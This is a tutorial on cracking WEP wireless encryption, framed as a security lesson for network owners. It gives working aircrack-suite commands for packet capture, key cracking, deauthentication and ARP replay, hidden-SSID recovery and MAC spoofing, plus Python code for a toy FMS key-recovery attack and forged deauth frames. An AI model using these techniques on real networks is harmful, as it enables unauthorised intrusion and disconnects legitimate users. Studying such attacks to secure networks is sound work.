WLAN hacking

Author:  Sven Knispel
Updated:  [udate]

Hacking other people's WLANs is illegal and unethical. This article is not about penetrating foreign WLANs but about learning something about security. The techniques described here apply to WEP encryption, not WPA.

I have successfully installed the tools on Fedora Core 3 (FC3) and Fedora Core 4 (FC4).

It is amazing how many people believe that hiding their SSID or rejecting foreign MAC addresses is secure enough. The reality is different: even WEP encryption with a 128-bit key is not secure, because the 24-bit IV is sent in clear with every frame and the RC4 key schedule leaks key bytes for certain IV values.
I recommend anyone running a WLAN to try the techniques from this article and find out how easy it is for someone with bad intentions to penetrate a wireless LAN.
This article focuses on installing and using the available tools to detect a wireless network, gather the required details and crack its WEP encryption:

  • Installing and using kismet, aireplay, airodump and aircrack
  • Collecting encrypted packets
  • Cracking the WEP key from collected data
  • Common techniques and attacks on WLANs

For those who don't want to configure their Linux to do this, there are pre-configured Live CDs worth looking at:

1. References

There are many sources on this matter. I especially recommend these:

2. Setup

Note these steps are not required if you use a Live CD.

2.1 Kismet

Download Kismet for FC4 from http://rpmforge.net/user/packages/kismet/ and install it:
rpm -ivh kismet-3.0.1-3.200508r1.2.fc4.rf.i386.rpm
Then edit /etc/kismet.conf (also see http://www.kismetwireless.net/documentation.shtml):

  • Set the user id
  • Set the source (section 12 of the documentation explains how to configure the source; mine looks like "madwifi_g, ath0, some-name")

2.2. Aircrack

Download and install the aircrack tools suite, e.g. from http://rpm.pbone.net/index.php3/stat/4/idpl/2210150/com/aircrack-2.23-1.1.fc3.rf.i386.rpm.html.

3. Cracking WEP

3.1. Collect data with kismet

3.1.1. Gather access point data

Highlight the access point and press "enter".
From the details screen collect the access point MAC address (BSSID) and the channel.
Go back to the main screen with "q".

3.1.2. Display associated client data

Highlight the access point and press "Shift-C".
Look for clients of type "E" (established).

3.2. Capture packets with airodump

To capture data the NIC must be set to monitor mode on the channel detected earlier:
iwconfig ath0 mode Monitor channel <channel>
Then start the capture:
airodump <interface> <capture-file> <channel>
Wait until WEP-encrypted data has been collected. It is important to look for WEP-encrypted data sent to or from the target access point: only frames carrying distinct IVs for that BSSID help the attack, so the counts below are really counts of IVs, not of frames in general.
For a 64-bit WEP key between about 50,000 and 200,000 packets are required, for 128 bits between 200,000 and 700,000.

3.3. Crack WEP keys with aircrack

Using the captured encrypted data we will now use aircrack to crack the key.
Start aircrack on the cap file:
aircrack -e <ssid> -f 2 -m <mac address of AP> -n <key-len> [-q] <filename>
Here -e is the ESSID, -m the BSSID, -n the key length (64 or 128) and -q suppresses the status output. -f is the fudge factor: the higher it is, the more key-byte candidates aircrack tries beyond the best-voted one, at the cost of running time.
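To make concrete what aircrack does with the collected IVs, and why the fudge factor exists, here is a toy implementation of the Fluhrer-Mantin-Shamir (FMS) attack on WEP-40. It is an added example written for this article, not aircrack's code. It simulates a capture in which every frame uses a weak IV of the form (A+3, 255, X), uses the fact that the first plaintext byte of every WEP data frame is the LLC/SNAP byte 0xAA, votes for each key byte in turn, and then searches the best-voted candidates per byte (the fudge factor) while verifying each complete key against the capture. The secret key, the IV list and the 8-frame verification are constructed for the example.

```python
"""Toy FMS (Fluhrer-Mantin-Shamir) attack on WEP-40: RC4 keyed with IV || secret.
Added example for this article; not aircrack's implementation."""

WEP40_KEY_LEN = 5   # 40-bit secret key; the per-packet RC4 key is 3 IV bytes + 5
SNAP_DSAP = 0xAA    # first plaintext byte of every WEP data frame (LLC/SNAP header)


def rc4_ksa(key):
    """RC4 key scheduling: the permutation S after all 256 steps."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_first_byte(key):
    """First keystream byte of RC4 under `key` (one PRGA step, i = 1)."""
    s = rc4_ksa(key)
    j = s[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) & 0xFF]


def first_ciphertext_byte(iv, secret):
    """What a sniffer sees: the first encrypted byte of a frame sent with this IV."""
    return rc4_first_byte(bytes(iv) + secret) ^ SNAP_DSAP


def capture_weak_ivs(secret, key_len=WEP40_KEY_LEN):
    """Constructed capture: one frame for each FMS weak IV (A+3, 255, X)."""
    return [((a + 3, 255, x), first_ciphertext_byte((a + 3, 255, x), secret))
            for a in range(key_len) for x in range(256)]


def vote_key_byte(frames, known):
    """FMS vote for the secret key byte that follows the already recovered prefix."""
    a = len(known)
    votes = [0] * 256
    for iv, c0 in frames:
        z = c0 ^ SNAP_DSAP              # first keystream byte (known plaintext)
        k = list(iv) + list(known)      # the first a+3 bytes of the RC4 key are known
        s, j = list(range(256)), 0
        for i in range(a + 3):          # replay the KSA as far as we can
            j = (j + s[i] + k[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        # "Resolved" IV: with probability ~e^-3 the remaining KSA steps leave
        # s[1], s[s[1]] and s[a+3] alone; then z is the value moved into position
        # a+3 at the next step, which depends on the unknown key byte.
        if s[1] < a + 3 and (s[1] + s[s[1]]) & 0xFF == a + 3:
            guess = (s.index(z) - j - s[a + 3]) & 0xFF
            votes[guess] += 1
    return votes


def fms_crack(frames, key_len=WEP40_KEY_LEN, fudge=3):
    """Recover the secret key byte by byte. Like aircrack's -f option, try the
    `fudge` best-voted candidates for each byte and accept a full key only if it
    reproduces the first ciphertext byte of the sample frames."""
    def verify(secret):
        return all(first_ciphertext_byte(iv, secret) == c0 for iv, c0 in frames[:8])

    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            return key if verify(key) else None
        votes = vote_key_byte(frames, known)
        for candidate in sorted(range(256), key=lambda b: -votes[b])[:fudge]:
            found = search(known + [candidate])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    SECRET = bytes.fromhex("1f2e3d4c5b")            # constructed WEP-40 key
    frames = capture_weak_ivs(SECRET)
    print(f"{len(frames)} frames captured, key recovered: {fms_crack(frames).hex()}")
```

Only a small fraction of the random IVs in a real capture satisfy the resolved condition tested in vote_key_byte, which is why airodump has to collect hundreds of thousands of frames while this simulation gets by with 1280 hand-picked ones; aircrack also implements the KoreK attacks on top of FMS to get more out of each IV. The same vote-and-verify structure is what makes the fudge factor useful: a key byte that lost the vote narrowly is still found at the cost of more candidate keys to check.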

4. Hints and tips

4.1. Drivers with packet injection

A number of attacks can be run on a WLAN to gather information or to speed up data collection.
If you don't use a Live CD you need a WLAN driver that supports packet injection for these.

The process of recompiling different drivers is described here.

For MADWIFI I was able to recompile the drivers for version 20050707:
ifconfig ath0 down
rmmod wlan_wep ath_rate_onoe ath_pci wlan ath_hal

find /lib/modules -name 'ath*' -exec rm -v {} \;
find /lib/modules -name 'wlan*' -exec rm -v {} \;
cd /usr/src
wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20050707.tgz
wget http://100h.org/wlan/linux/patches/madwifi-cvs-20050707.patch
tar -xvzf madwifi-cvs-20050707.tgz
cd madwifi-cvs-20050707
patch -Np1 -i ../madwifi-cvs-20050707.patch
make && make install
modprobe ath_pci
On FC4 I have had some trouble with make due to a missing uudecode. This was solved by installing the sharutils package.

4.2. DeAuth attack

The speed of data collection can be increased by a so-called deauth attack: the clients are kicked off the access point and reconnect. A client that has just reconnected typically sends an ARP request; if that request is captured it can be replayed over and over, and every reply the access point sends carries a fresh IV.
aireplay provides the functionality for these attacks:
aireplay -0 2 -a <AP MAC> ath0 broadcasts a deauth and forces the clients to reauthenticate
aireplay -3 -x 600 -b <AP MAC> -h <client MAC> ath0 captures ARP requests from the client and replays them (600 packets per second)
airodump ath0 <file> <channel> captures the data

We would use the following steps:

  • start airodump to collect the data (for WEP128 about 500k packets seems right)
  • start aireplay -3 ..... to capture and replay ARP requests: at first it says "got 0 ARP requests"
  • start aireplay -0 .... to deauth a client: after a while the number of ARP packets increases
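What aireplay actually sends in 4.2 (and in 4.3 below) is a bare 802.11 management frame, and what it looks for in -3 mode is a WEP data frame of a tell-tale size. The following added example, written for this article and not taken from aircrack, builds a deauthentication frame, decodes the header fields the tools rely on, pulls out the IV that airodump collects and applies the size test that spots an encrypted ARP request without decrypting anything. The MAC addresses, IVs and ciphertext bytes are constructed; the reason code 7 is an assumption.

```python
import struct

# Constructed example for this article, not aircrack's code: the deauthentication
# frame behind "aireplay -0" and the size test behind "aireplay -3".

BROADCAST = b"\xff" * 6
WEP_IV_LEN, WEP_ICV_LEN, LLC_SNAP_LEN, ARP_LEN = 4, 4, 8, 28


def mac(text):
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def build_deauth(bssid, station=BROADCAST, reason=7, seq=0):
    """802.11 deauthentication frame: management type 0, subtype 12, no FCS.
    addr1 = receiver, addr2 = transmitter (forged as the AP), addr3 = BSSID.
    Nothing in it is authenticated, which is why the attack works at all.
    Reason 7 (class 3 frame from a non-associated station) is an assumption."""
    frame_control = bytes([0xC0, 0x00])          # subtype 12 << 4 | type 0 << 2
    duration = struct.pack("<H", 0)
    seq_ctrl = struct.pack("<H", seq << 4)       # sequence number, fragment 0
    return (frame_control + duration + station + bssid + bssid + seq_ctrl
            + struct.pack("<H", reason))


def parse_header(frame):
    """Decode the fields of the 24-byte 802.11 MAC header that the tools use."""
    fc0, fc1 = frame[0], frame[1]
    return {
        "type": (fc0 >> 2) & 0x3,
        "subtype": fc0 >> 4,
        "to_ds": fc1 & 0x1,
        "from_ds": (fc1 >> 1) & 0x1,
        "protected": (fc1 >> 6) & 0x1,          # the "WEP" bit
        "addr1": frame[4:10], "addr2": frame[10:16], "addr3": frame[16:22],
    }


def is_deauth(frame):
    h = parse_header(frame)
    return h["type"] == 0 and h["subtype"] == 12


def wep_iv(frame):
    """(3-byte IV, key index) of a WEP data frame; this is what airodump collects."""
    iv_field = frame[24:24 + WEP_IV_LEN]
    return iv_field[:3], iv_field[3] >> 6


def looks_like_wep_arp(frame):
    """WEP hides content but not length: an ARP request inside LLC/SNAP encrypts
    to exactly 8 + 28 + 4 (ICV) = 40 bytes and goes to the broadcast address."""
    h = parse_header(frame)
    if h["type"] != 2 or not h["protected"]:
        return False
    dst = h["addr3"] if h["to_ds"] else h["addr1"]   # address layout depends on ToDS
    body = frame[24 + WEP_IV_LEN:]
    return dst == BROADCAST and len(body) == LLC_SNAP_LEN + ARP_LEN + WEP_ICV_LEN


def build_wep_data(bssid, src, dst, iv, ciphertext, key_index=0, to_ds=True):
    """Constructed WEP data frame. `ciphertext` stands in for the RC4-encrypted
    LLC/SNAP header, payload and ICV; its content is not meaningful."""
    flags = (0x01 if to_ds else 0x02) | 0x40        # ToDS/FromDS plus the WEP bit
    frame_control = bytes([0x08, flags])            # type 2 (data), subtype 0
    a1, a2, a3 = (bssid, src, dst) if to_ds else (dst, bssid, src)
    header = (frame_control + struct.pack("<H", 0) + a1 + a2 + a3
              + struct.pack("<H", 0))
    return header + iv + bytes([key_index << 6]) + ciphertext


AP = mac("00:0f:66:12:34:56")                       # constructed addresses
CLIENT = mac("00:0d:93:ab:cd:ef")

DEAUTH = build_deauth(AP, CLIENT)
ARP_FRAME = build_wep_data(AP, CLIENT, BROADCAST, b"\x01\x02\x03", bytes(range(40)))
BIG_FRAME = build_wep_data(AP, CLIENT, BROADCAST, b"\x01\x02\x04", bytes(range(200)))

if __name__ == "__main__":
    print("deauth:", DEAUTH.hex())
    for name, f in (("ARP_FRAME", ARP_FRAME), ("BIG_FRAME", BIG_FRAME)):
        print(name, len(f), "bytes, IV", wep_iv(f)[0].hex(), "ARP?", looks_like_wep_arp(f))
```

The 68-byte total of ARP_FRAME (24-byte header, 4-byte IV/key-id, 40-byte encrypted body) is the size class aireplay watches for; real drivers append the 4-byte FCS on the air. The same deauth frame, sent with the broadcast station address, is what recovers a hidden SSID in 4.3: the reconnecting clients name the network in clear in their probe and association requests.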

4.3. Hidden SSIDs

Some access points are configured not to broadcast their SSID. The access point is still shown in kismet but the SSID is not displayed. The SSID can be recovered with a deauth from aireplay, because the reconnecting clients send it in clear in their probe and association requests:
aireplay -0 2 -a <AP MAC> ath0

4.4. Spoofing MAC address

Some access points have a filter of allowed MAC addresses. The WEP key alone is then not enough to connect to the wireless LAN, but the filter should not be relied on in the belief that MAC addresses cannot be spoofed: the addresses of the associated clients are visible in clear in every frame (see 3.1.2).
If supported by the driver (it is for the Madwifi driver I am using) this simple command replaces the MAC address; bring the interface down with ifconfig <interface> down first:
ifconfig <interface> hw ether <MAC-address>